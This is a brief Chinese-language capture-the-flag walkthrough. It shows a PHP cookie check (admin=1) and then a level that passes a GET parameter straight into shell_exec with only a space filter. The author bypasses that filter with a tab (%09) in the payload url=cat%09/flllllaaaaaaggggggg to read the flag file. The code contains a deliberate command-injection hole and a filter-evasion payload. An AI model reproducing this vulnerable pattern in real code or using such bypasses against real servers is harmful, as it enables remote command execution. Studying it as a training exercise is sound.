<?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);
if($_COOKIE['admin']==1)
{
include "../next.php";
}
else
echo "小饼干最好吃啦!";
?>
代码的意思也很简单就是,cookie中带有admin=1,就包含next.php文件
在数据包中添加一条
提示进入下一关
访问对应网页
<?php
error_reporting(0);
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET['url'])) {
$ip=$_GET['url'];
if(preg_match("/ /", $ip)){
die('nonono');
}
$a = shell_exec($ip);
echo $a;
}
?>
下一关代码,获取url,如果匹配到空格就结束,就是说命令执行不能包含空格
空格绕过的方式有很多,我随便提一个%09也就是我们的tab键
url=cat%09/flllllaaaaaaggggggg